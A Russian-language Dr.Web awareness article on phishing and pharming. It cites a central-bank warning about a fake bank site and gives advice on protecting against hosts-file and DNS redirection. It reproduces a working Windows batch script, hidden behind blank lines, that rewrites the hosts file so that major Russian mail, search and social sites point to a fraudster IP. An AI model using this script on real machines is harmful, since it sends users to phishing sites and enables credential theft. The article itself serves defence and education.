Вы используете устаревший браузер!

Страница может отображаться некорректно.

  • добавить в избранное
    Добавить в закладки

Поскользнулся, упал, очнулся — гипс!

Прочитали: 4511 Комментариев: 124 Рейтинг: 298

Кто не знает фишинг? Фишинг знают все! Действительно, о фишинге — интернет-мошенничестве с использованием почтовых рассылок с предложением товаров и услуг — известно подавляющему большинству пользователей. Естественно, уровень осведомленности растет, и они все более подозрительно относятся к приходящим письмам.

А злоумышленники, в свою очередь, придумывают новые уловки с целью выманивания денег у доверчивых и добрых людей.

#drweb

Банк России выявил сайт Mngb.ru, незаконно предлагающий услуги от лица некоего Metro Neal Guardian Bank. Этой организации ЦБ не выдавал лицензию для работы в России, отмечается в релизе регулятора.

Между тем на сайте Mngb.ru сказано: «Генеральная лицензия на осуществление банковских операций № 1366, выдана Центральным Банком РФ 14.01.2015, бессрочная».

Утверждается, что центральный офис банка расположен в Вашингтоне, а представительство в России находится по адресу: Москва, Волоколамское шоссе, 90 строение 3. Между тем на московских картах по такому адресу банка не значится. В здании находится только государственное машиностроительное КБ имени И. И. Торопова «Вымпел».

На сайте также указан несуществующий ИНН. Мошенники предлагают оформить кредитные карты Visa и MasterCard.

Банк России призывает проверять информацию по зарегистрированным банкам на своем сайте.

http://polit.ru/news/2016/07/12/false_bank

Фарминг ("pharming" – производное от английских слов "phishing" и "farming" – занятие сельским хозяйством, животноводством).

Как и фишеры, люди, занимающиеся фармингом, используют мошеннические сайты, но жертвы попадают туда без добровольного клика по ссылке, а совершенно незаметно для себя.

Пользователи перенаправляются на мошеннический сайт автоматически — даже тогда, когда вводят правильный веб-адрес.

Для этого жулики используют вредоносное ПО, вносят изменения в файл hosts и настройки сервиса DNS. Так атака становится незаметной, а участие пользователя сводится к минимуму. В принципе, атака может быть даже целевой – злоумышленнику достаточно дождаться, когда пользователь решит посетить определенные сайты.

Насколько сложно выманить жертву на сайт фармера (не путать с фермером!)? Один из сценариев ловушки.

— Здравствуй ) У меня не рaбoтает фaйл один нужный, можешь прoверить у себя?
— Могу, привет)

...

Ничего не подозревающий пользователь щелкает по этому файлу и… выполняется следующий код:

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: default
@rem ----- ExeScript Options End -----
@echo off
echo 81.94.229.115 www.mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.i.ua >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 m.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 google.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 www.ya.ru >> %windir%\system32\drivers\etc\hosts
echo 81.94.229.115 ya.ru >> %windir%\system32\drivers\etc\hosts

Кстати, перед собственно телом скрипта в файле 662 пустые строки.

https://habrahabr.ru/post/73515

В результате вместо всех указанных выше сайтов откроется сайт мошенников. #фишинг #мошенничество

Dr.Web рекомендует

Защититься от фарминга крайне сложно, сайты компаний изменяются постоянно, и пользователи не могут регулярно отслеживать такие изменения. Чтобы застраховаться от перенаправления на другой сайт, рекомендуется:

  • Контролировать попытки изменения файла Hosts, выбрав удобный для вас уровень работы Превентивной защиты Dr.Web Security Space.

    #drweb

    #drweb

    Для настройки параметров Превентивной защиты кликните по значку #drweb в системном меню, затем в открывшемся меню последовательно нажмите на #drweb и появившийся значок #drweb. В открывшемся окне Настройки выберите пункт Компоненты защиты и далее Превентивная защита.

    Здесь вы можете настроить реакцию антивируса на действия сторонних приложений, которые могут привести к заражению вашего компьютера.

    #drweb

  • Изменения сетевых настроек возможны во многом благодаря тому, что пользователи работают с правами администраторов, и получившие доступ к компьютеру злоумышленники могут распоряжаться его настройками именно с этими правами. Не следует работать с правами администраторов после завершения настроек своего компьютера!
  • Регулярно проверяйте выписки со своего банковского счета. Развитие интернет-банкинга – это удобство не только для пользователей, но и для злоумышленников. Банки могут уведомлять клиентов обо всех или только подозрительных операциях, но эти сообщения могут быть скрыты или подделаны.

    Только вы владеете достоверной информацией о том, где были потрачены деньги, поэтому не забывайте регулярно проверять баланс своего счета!

  • Устанавливайте все обновления безопасности для операционной системы и используемого ПО.
  • Не следует вводить личные сведения на сайте, на который вы попали по внешней ссылке или из всплывающего рекламного сообщения (даже на легитимном веб-сайте). Откройте новое окно браузера и введите ip-адрес ресурса (узнав его, например, на ином устройстве) вручную в адресной строке, чтобы убедиться в подлинности сайта. Прежде чем вводить личные данные, всегда проверяйте правильность URL страницы.
  • Получив электронное письмо от имени банка, интернет-магазина, социальной сети или любой другой компании, убедитесь, что оно отправлено с официального электронного адреса организации. Для общения с клиентами банки не используют такие общедоступные домены как gmail.com, yahoo.co.uk и т. д.
  • Гарантированно уничтожайте ненужную финансовую информацию. Пользователи часто выбрасывают бумаги с такими сведениями, в том числе распечатанные документы с данными интернет-банкинга, счета с записанными паролями и т. п. Любую личную информацию, включая выписки с банковского счета и карты с истекшим сроком действия, рекомендуется уничтожать путем измельчения.
  • Сообщайте о случаях мошенничества в Интернете. В частности, это можно сделать непосредственно на сайте «Доктор Веб», отправив запрос в службу поддержки. Ваша информация важна не нам – она важна всем пользователям, которых стремятся поймать на удочку!

Получайте Dr.Web-ки за участие в проекте

Каждая активность = 1 Dr.Web-ка

Оцените выпуск

Сделайте репост

Поставьте «Нравится»

Чтобы получать награды надо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

10 Dr.Web-ок за комментарий в день выхода выпуска или 1 Dr.Web-ка в любой другой день. Комментарии публикуются автоматически и постмодерируются. Правила комментирования новостей «Доктор Веб».

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей


 
На страницу: